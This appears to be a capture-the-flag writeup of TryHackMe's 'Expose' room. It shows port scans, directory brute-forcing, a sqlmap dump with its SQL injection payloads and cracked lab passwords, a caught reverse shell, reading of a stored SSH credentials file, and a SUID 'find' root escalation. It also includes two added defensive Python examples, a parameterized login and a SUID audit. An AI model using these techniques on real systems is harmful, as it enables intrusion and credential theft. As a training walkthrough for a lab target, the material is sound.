Expose
The following post by anthonyjsaab is licensed under
Link to room:
Machine version: exposev6
This writeup walks you through a room on TryHackMe created by and
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -T4 -p- 10.10.98.61
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-28 22:16 EEST
Nmap scan report for 10.10.98.61
Host is up (0.11s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
1337/tcp open waste
1883/tcp open mqtt
Nmap done: 1 IP address (1 host up) scanned in 307.40 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -O -p21,22,53,1337,1883 10.10.98.61
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-28 22:34 EEST
Nmap scan report for 10.10.98.61
Host is up (0.12s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.14.78.249
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 ad:d9:d8:be:90:d5:56:e1:71:9d:62:c5:b9:0c:96:d3 (RSA)
| 256 7b:7c:73:15:62:ec:94:23:d2:2d:d2:3a:ab:e6:c5:de (ECDSA)
|_ 256 33:56:a6:f9:dc:3c:af:24:73:78:75:7e:05:c5:77:57 (ED25519)
53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.16.1-Ubuntu
1337/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: EXPOSED
1883/tcp open mosquitto version 1.6.9
| mqtt-subscribe:
| Topics and their most recent payloads:
| $SYS/broker/heap/current: 47240
| $SYS/broker/clients/active: 0
| $SYS/broker/load/bytes/sent/1min: 3.65
| $SYS/broker/uptime: 3454 seconds
| $SYS/broker/version: mosquitto version 1.6.9
| $SYS/broker/load/messages/sent/5min: 0.20
| $SYS/broker/store/messages/bytes: 180
| $SYS/broker/bytes/sent: 4
| $SYS/broker/load/bytes/received/15min: 1.19
| $SYS/broker/load/sockets/5min: 0.20
| $SYS/broker/load/messages/sent/15min: 0.07
| $SYS/broker/messages/received: 1
| $SYS/broker/load/connections/1min: 0.91
| $SYS/broker/load/bytes/received/1min: 16.45
| $SYS/broker/load/sockets/1min: 0.76
| $SYS/broker/load/sockets/15min: 0.07
| $SYS/broker/heap/maximum: 49688
| $SYS/broker/load/bytes/sent/15min: 0.27
| $SYS/broker/load/messages/sent/1min: 0.91
| $SYS/broker/bytes/received: 18
| $SYS/broker/load/messages/received/5min: 0.20
| $SYS/broker/load/messages/received/1min: 0.91
| $SYS/broker/clients/disconnected: 0
| $SYS/broker/load/connections/5min: 0.20
| $SYS/broker/clients/inactive: 0
| $SYS/broker/load/bytes/received/5min: 3.53
| $SYS/broker/load/connections/15min: 0.07
| $SYS/broker/messages/sent: 1
| $SYS/broker/load/messages/received/15min: 0.07
| $SYS/broker/clients/connected: 0
|_ $SYS/broker/load/bytes/sent/5min: 0.79
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (93%), Linux 2.6.39 - 3.2 (93%), Linux 3.1 - 3.2 (93%), Linux 3.11 (93%), Linux 3.2 - 4.9 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.87 seconds
┌──(kali㉿kali)-[~]
└─$ nmap -sV --script vulners -p21,22,53,1337,1883 10.10.98.61
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-28 22:37 EEST
Nmap scan report for 10.10.98.61
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| vulners:
| vsftpd 2.0.8 or later:
| PACKETSTORM:162145 10.0 https://vulners.com/packetstorm/PACKETSTORM:162145*EXPLOIT*
| EDB-ID:49757 10.0 https://vulners.com/exploitdb/EDB-ID:49757 *EXPLOIT*
| CVE-2011-2523 10.0 https://vulners.com/cve/CVE-2011-2523
|_ 1337DAY-ID-36095 10.0 https://vulners.com/zdt/1337DAY-ID-36095 *EXPLOIT*
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:8.2p1:
53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux)
| vulners:
| cpe:/a:isc:bind:9.16.1:
1337/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| vulners:
| cpe:/a:apache:http_server:2.4.41:
1883/tcp open mosquitto version 1.6.9
| mqtt-subscribe:
| Topics and their most recent payloads:
| $SYS/broker/clients/disconnected: 1
| $SYS/broker/clients/maximum: 2
| $SYS/broker/store/messages/bytes: 154
| $SYS/broker/publish/messages/sent: 59
| $SYS/broker/clients/active: 1
| $SYS/broker/load/bytes/received/5min: 22.45
| $SYS/broker/load/messages/sent/15min: 4.00
| $SYS/broker/heap/maximum: 52480
| $SYS/broker/messages/received: 7
| $SYS/broker/version: mosquitto version 1.6.9
| $SYS/broker/load/bytes/received/1min: 69.93
| $SYS/broker/messages/stored: 32
| $SYS/broker/load/messages/received/5min: 1.09
| $SYS/broker/subscriptions/count: 4
| $SYS/broker/load/bytes/sent/5min: 377.76
| $SYS/broker/load/connections/15min: 0.25
| $SYS/broker/load/sockets/5min: 0.82
| $SYS/broker/bytes/sent: 2358
| $SYS/broker/clients/inactive: 1
| $SYS/broker/load/bytes/received/15min: 8.62
| $SYS/broker/load/connections/1min: 2.01
| $SYS/broker/load/sockets/15min: 0.31
| $SYS/broker/uptime: 3597 seconds
| $SYS/broker/store/messages/count: 32
| $SYS/broker/load/sockets/1min: 2.61
| $SYS/broker/publish/bytes/sent: 263
| $SYS/broker/messages/sent: 65
| $SYS/broker/retained messages/count: 35
| $SYS/broker/bytes/received: 140
| $SYS/broker/load/bytes/sent/1min: 1163.22
| $SYS/broker/load/publish/sent/1min: 28.72
| $SYS/broker/load/messages/sent/5min: 10.38
| $SYS/broker/load/publish/sent/15min: 3.63
| $SYS/broker/clients/total: 2
| $SYS/broker/load/publish/sent/5min: 9.42
| $SYS/broker/load/connections/5min: 0.64
| $SYS/broker/clients/connected: 1
| $SYS/broker/load/messages/received/1min: 3.13
| $SYS/broker/load/messages/received/15min: 0.43
| $SYS/broker/load/messages/sent/1min: 31.75
| $SYS/broker/load/bytes/sent/15min: 145.21
|_ $SYS/broker/heap/current: 52080
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.89 seconds
┌──(kali㉿kali)-[~]
└─$ gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://10.10.98.61:1337
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.98.61:1337
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 278]
/.htpasswd (Status: 403) [Size: 278]
/.htaccess (Status: 403) [Size: 278]
/admin (Status: 301) [Size: 317] [--> http://10.10.98.61:1337/admin/]
/index.php (Status: 200) [Size: 91]
/javascript (Status: 301) [Size: 322] [--> http://10.10.98.61:1337/javascript/]
/phpmyadmin (Status: 301) [Size: 322] [--> http://10.10.98.61:1337/phpmyadmin/]
/server-status (Status: 403) [Size: 278]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
┌──(kali㉿kali)-[~]
└─$ gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://10.10.98.61:1337
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.98.61:1337
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd (Status: 403) [Size: 278]
/.htaccess (Status: 403) [Size: 278]
/admin (Status: 301) [Size: 317] [--> http://10.10.98.61:1337/admin/]
/admin_101 (Status: 301) [Size: 321] [--> http://10.10.98.61:1337/admin_101/]
/javascript (Status: 301) [Size: 322] [--> http://10.10.98.61:1337/javascript/]
/phpmyadmin (Status: 301) [Size: 322] [--> http://10.10.98.61:1337/phpmyadmin/]
/server-status (Status: 403) [Size: 278]
Progress: 20469 / 20470 (100.00%)
===============================================================
Finished
===============================================================
2cii - SQLmap
┌──(kali㉿kali)-[~]
└─$ sqlmap -u http://10.10.89.22:1337/admin_101/includes/user_login.php --data "email=*&password=*" --dump
___
__H__
___ ___[']_____ ___ ___ {1.8.4#stable}
|_ -| . [.] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 21:27:04 /2024-04-30/
custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q]
[21:27:05] [INFO] resuming back-end DBMS 'mysql'
[21:27:05] [INFO] testing connection to the target URL
[21:27:05] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
[21:27:05] [INFO] testing if the target URL content is stable
[21:27:05] [INFO] target URL content is stable
[21:27:05] [INFO] testing if (custom) POST parameter '#1*' is dynamic
[21:27:06] [INFO] (custom) POST parameter '#1*' appears to be dynamic
[21:27:06] [INFO] heuristic (basic) test shows that (custom) POST parameter '#1*' might be injectable (possible DBMS: 'MySQL')
[21:27:06] [INFO] heuristic (XSS) test shows that (custom) POST parameter '#1*' might be vulnerable to cross-site scripting (XSS) attacks
[21:27:06] [INFO] testing for SQL injection on (custom) POST parameter '#1*'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[21:27:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:27:11] [WARNING] reflective value(s) found and filtering out
[21:27:12] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[21:27:12] [INFO] testing 'Generic inline queries'
[21:27:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[21:27:20] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[21:27:26] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[21:27:33] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[21:27:44] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[21:27:57] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[21:28:10] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[21:28:23] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[21:28:36] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[21:28:37] [INFO] (custom) POST parameter '#1*' appears to be 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' injectable
[21:28:37] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[21:28:37] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[21:28:37] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[21:28:37] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[21:28:38] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[21:28:38] [INFO] (custom) POST parameter '#1*' is 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)' injectable
[21:28:38] [INFO] testing 'MySQL inline queries'
[21:28:38] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[21:28:38] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[21:28:38] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[21:28:38] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[21:28:39] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[21:28:39] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[21:28:39] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[21:28:49] [INFO] (custom) POST parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[21:28:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[21:28:49] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[21:28:49] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[21:28:53] [INFO] target URL appears to be UNION injectable with 4 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
[21:29:07] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[21:29:07] [INFO] testing 'MySQL UNION query (60) - 21 to 40 columns'
[21:29:11] [INFO] testing 'MySQL UNION query (60) - 41 to 60 columns'
[21:29:14] [INFO] testing 'MySQL UNION query (60) - 61 to 80 columns'
[21:29:17] [INFO] testing 'MySQL UNION query (60) - 81 to 100 columns'
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 685 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: email=' AND EXTRACTVALUE(2974,CASE WHEN (2974=2974) THEN 2974 ELSE 0x3A END)-- xTMY&password=
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: email=' AND GTID_SUBSET(CONCAT(0x7171716b71,(SELECT (ELT(7352=7352,1))),0x71766b7671),7352)-- PMCO&password=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: email=' AND (SELECT 4226 FROM (SELECT(SLEEP(5)))tBxm)-- HYpo&password=
---
[21:29:23] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 19.10 or 20.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.6
[21:29:23] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[21:29:23] [INFO] fetching current database
[21:29:23] [INFO] retrieved: 'expose'
[21:29:23] [INFO] fetching tables for database: 'expose'
[21:29:24] [INFO] retrieved: 'config'
[21:29:24] [INFO] retrieved: 'user'
[21:29:24] [INFO] fetching columns for table 'config' in database 'expose'
[21:29:24] [INFO] retrieved: 'id'
[21:29:24] [INFO] retrieved: 'int'
[21:29:25] [INFO] retrieved: 'url'
[21:29:25] [INFO] retrieved: 'text'
[21:29:25] [INFO] retrieved: 'password'
[21:29:25] [INFO] retrieved: 'text'
[21:29:25] [INFO] fetching entries for table 'config' in database 'expose'
[21:29:25] [INFO] retrieved: '/file1010111/index.php'
[21:29:25] [INFO] retrieved: '1'
[21:29:26] [INFO] retrieved: '69c66901194a6486176e81f5945b8929'
[21:29:26] [INFO] retrieved: '/upload-cv00101011/index.php'
[21:29:26] [INFO] retrieved: '3'
[21:29:26] [INFO] retrieved: '// ONLY ACCESSIBLE THROUGH USERNAME STARTING WITH Z'
[21:29:26] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
do you want to crack them via a dictionary-based attack? [Y/n/q]
[21:29:35] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>
[21:29:38] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N]
[21:29:41] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[21:29:41] [INFO] starting 4 processes
[21:29:43] [INFO] cracked password 'easytohack' for hash '69c66901194a6486176e81f5945b8929'
Database: expose
Table: config
[2 entries]
+----+------------------------------+-----------------------------------------------------+
| id | url | password |
+----+------------------------------+-----------------------------------------------------+
| 1 | /file1010111/index.php | 69c66901194a6486176e81f5945b8929 (REDACTED_BY_ME) |
| 3 | /upload-cv00101011/index.php | // ONLY ACCESSIBLE THROUGH USERNAME STARTING WITH Z |
+----+------------------------------+-----------------------------------------------------+
[21:29:46] [INFO] table 'expose.config' dumped to CSV file '/home/kali/.local/share/sqlmap/output/10.10.89.22/dump/expose/config.csv'
[21:29:46] [INFO] fetching columns for table 'user' in database 'expose'
[21:29:46] [INFO] retrieved: 'id'
[21:29:46] [INFO] retrieved: 'int'
[21:29:47] [INFO] retrieved: 'email'
[21:29:47] [INFO] retrieved: 'varchar(512)'
[21:29:47] [INFO] retrieved: 'password'
[21:29:47] [INFO] retrieved: 'varchar(512)'
[21:29:47] [INFO] retrieved: 'created'
[21:29:47] [INFO] retrieved: 'timestamp'
[21:29:47] [INFO] fetching entries for table 'user' in database 'expose'
[21:29:48] [INFO] retrieved: '2023-02-21 09:05:46'
[21:29:48] [INFO] retrieved: 'hacker@root.thm'
[21:29:48] [INFO] retrieved: '1'
[21:29:48] [INFO] retrieved: 'VeryDifficultPassword!!#@#@!#!@#1231'
Database: expose
Table: user
[1 entry]
+----+-----------------+---------------------+--------------------------------------+
| id | email | created | password |
+----+-----------------+---------------------+--------------------------------------+
| 1 | hacker@root.thm | 2023-02-21 09:05:46 | REDACTED_BY_ME |
+----+-----------------+---------------------+--------------------------------------+
[21:29:48] [INFO] table 'expose.`user`' dumped to CSV file '/home/kali/.local/share/sqlmap/output/10.10.89.22/dump/expose/user.csv'
[21:29:48] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.10.89.22'
[*] ending @ 21:29:48 /2024-04-30/
The SQLMap output was very helpful. It gave us:
- The password of hacker@root.thm on admin_101
- Files we have to inspect:
  - :1337/file1010111/index.php
  - :1337/upload-cv00101011/index.php
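The root cause behind that dump, shown from the fixing side. This is an added example, not the room's code: the query shape, the SQLite stand-in for MySQL, the `salt`/`pw` columns and the sample password are assumptions. It feeds the three `email` values from the sqlmap report to a concatenated query and to a bound one that also stores a salted PBKDF2 hash.

```python
import hashlib, hmac, os, sqlite3

# Email values copied from the sqlmap report above, used here as test input.
PAGE_PAYLOADS = [
    "' AND EXTRACTVALUE(2974,CASE WHEN (2974=2974) THEN 2974 ELSE 0x3A END)-- xTMY",
    "' AND GTID_SUBSET(CONCAT(0x7171716b71,(SELECT (ELT(7352=7352,1))),0x71766b7671),7352)-- PMCO",
    "' AND (SELECT 4226 FROM (SELECT(SLEEP(5)))tBxm)-- HYpo",
]

def kdf(password, salt):
    # Salted, slow hash instead of the bare MD5 and plaintext values in the dump.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 600_000)

def make_db():
    # Assumed schema, loosely modelled on the dumped `user` table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user (id INTEGER PRIMARY KEY, email TEXT, salt BLOB, pw BLOB)")
    salt = os.urandom(16)
    db.execute("INSERT INTO user (email, salt, pw) VALUES (?, ?, ?)",
               ("hacker@root.thm", salt, kdf("constructed-sample-password", salt)))
    return db

def login_concatenated(db, email):
    # Vulnerable form (assumed): user input is spliced into the statement text.
    return db.execute("SELECT id FROM user WHERE email = '" + email + "'").fetchone()

def alters_statement(db, email):
    # The page's payloads call MySQL-only functions, so SQLite raises as soon
    # as the input leaves the string literal and is parsed as SQL.
    try:
        login_concatenated(db, email)
        return False
    except sqlite3.OperationalError:
        return True

def login_bound(db, email, password):
    # Hardened form: the value is bound as data and cannot change the statement.
    row = db.execute("SELECT id, salt, pw FROM user WHERE email = ?", (email,)).fetchone()
    if row is None:
        kdf(password, b"\x00" * 16)  # keep timing similar for unknown accounts
        return None
    uid, salt, stored = row
    return uid if hmac.compare_digest(kdf(password, salt), stored) else None

if __name__ == "__main__":
    db = make_db()
    for p in PAGE_PAYLOADS:
        print(alters_statement(db, p), login_bound(db, p, ""))
```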
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.11.85.12] from (UNKNOWN) [10.10.89.22] 36222
Linux ip-10-10-89-22 5.15.0-1039-aws #44~20.04.1-Ubuntu SMP Thu Jun 22 12:21:12 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
19:17:49 up 2:16, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (781): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ip-10-10-89-22:/$ cd /home/zeamkish
www-data@ip-10-10-89-22:/home/zeamkish$ ls -la
ls -la
total 36
drwxr-xr-x 3 zeamkish zeamkish 4096 Jul 6 2023 .
drwxr-xr-x 4 root root 4096 Jun 30 2023 ..
-rw-rw-r-- 1 zeamkish zeamkish 5 Jul 6 2023 .bash_history
-rw-r--r-- 1 zeamkish zeamkish 220 Jun 8 2023 .bash_logout
-rw-r--r-- 1 zeamkish zeamkish 3771 Jun 8 2023 .bashrc
drwx------ 2 zeamkish zeamkish 4096 Jun 8 2023 .cache
-rw-r--r-- 1 zeamkish zeamkish 807 Jun 8 2023 .profile
-rw-r----- 1 zeamkish zeamkish 27 Jun 8 2023 flag.txt
-rw-rw-r-- 1 root zeamkish 34 Jun 11 2023 ssh_creds.txt
www-data@ip-10-10-89-22:/home/zeamkish$ cat ssh_creds.txt
cat ssh_creds.txt
SSH CREDS
zeamkish
REDACTED_BY_ME
Now that we have the SSH credentials, let us exit the dumb reverse shell and connect via SSH instead. Much more convenient.
┌──(kali㉿kali)-[~]
└─$ ssh zeamkish@10.10.89.22
The authenticity of host '10.10.89.22 (10.10.89.22)' can't be established.
ED25519 key fingerprint is SHA256:QVicBVNdk7FT/JLQ+djdhP3mB3y9OFF2iwsRiOoECNY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.89.22' (ED25519) to the list of known hosts.
zeamkish@10.10.89.22's password:
Permission denied, please try again.
zeamkish@10.10.89.22's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.15.0-1039-aws x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue Apr 30 19:22:42 UTC 2024
System load: 0.0 Processes: 126
Usage of /: 13.3% of 58.09GB Users logged in: 0
Memory usage: 18% IPv4 address for eth0: 10.10.89.22
Swap usage: 0%
* Ubuntu Pro delivers the most comprehensive open source security and
compliance features.
https://ubuntu.com/aws/pro
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Sun Jul 2 17:27:46 2023 from 10.10.83.109
zeamkish@ip-10-10-89-22:~$ cat flag.txt
THM{}
zeamkish@ip-10-10-89-22:~$
After I tried looking for something interesting in sudo -l, I began listing programs that are usually owned by root and that could have the SUID bit set. First try, find!
zeamkish@ip-10-10-89-22:~$ ls -la /usr/bin/find
-rwsr-x--- 1 root zeamkish 320160 Feb 18 2020 /usr/bin/find
zeamkish@ip-10-10-89-22:~$ find . -exec /bin/sh -p \; -quit
# cd /root
# ls
flag.txt snap
# cat flag.txt
THM{}
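A host audit that would have flagged the `-rwsr-x---` root-owned `find` before anyone used it. This is an added example, not part of the original writeup: the `EXEC_CAPABLE` deny list and the severity labels are assumptions chosen for illustration.

```python
import os
import stat

# Assumption: a short deny list of tools that can launch other programs.
# `find` is the one this page abuses through -exec.
EXEC_CAPABLE = {"find", "bash", "sh", "env", "python3", "perl"}

def classify(path, mode, uid):
    """Return a finding for one file, or None if it is not a setuid-root binary."""
    if not stat.S_ISREG(mode) or not mode & stat.S_ISUID or uid != 0:
        return None
    if mode & stat.S_IXOTH:
        who = "anyone"
    elif mode & stat.S_IXGRP:
        who = "group"
    else:
        who = "owner"
    risky = os.path.basename(path) in EXEC_CAPABLE and who != "owner"
    severity = "CRITICAL" if risky else "review"
    return f"{severity}: {path} setuid-root, executable by {who}"

def audit(root="/usr/bin"):
    """Walk a directory tree and collect findings for every setuid-root file."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue  # file vanished or is unreadable
            finding = classify(path, st.st_mode, st.st_uid)
            if finding:
                findings.append(finding)
    return sorted(findings)

if __name__ == "__main__":
    for line in audit():
        print(line)
```

On this box the fix is `chmod u-s /usr/bin/find`; the `review` entries are the distribution's expected setuid binaries and should be compared against a known-good baseline.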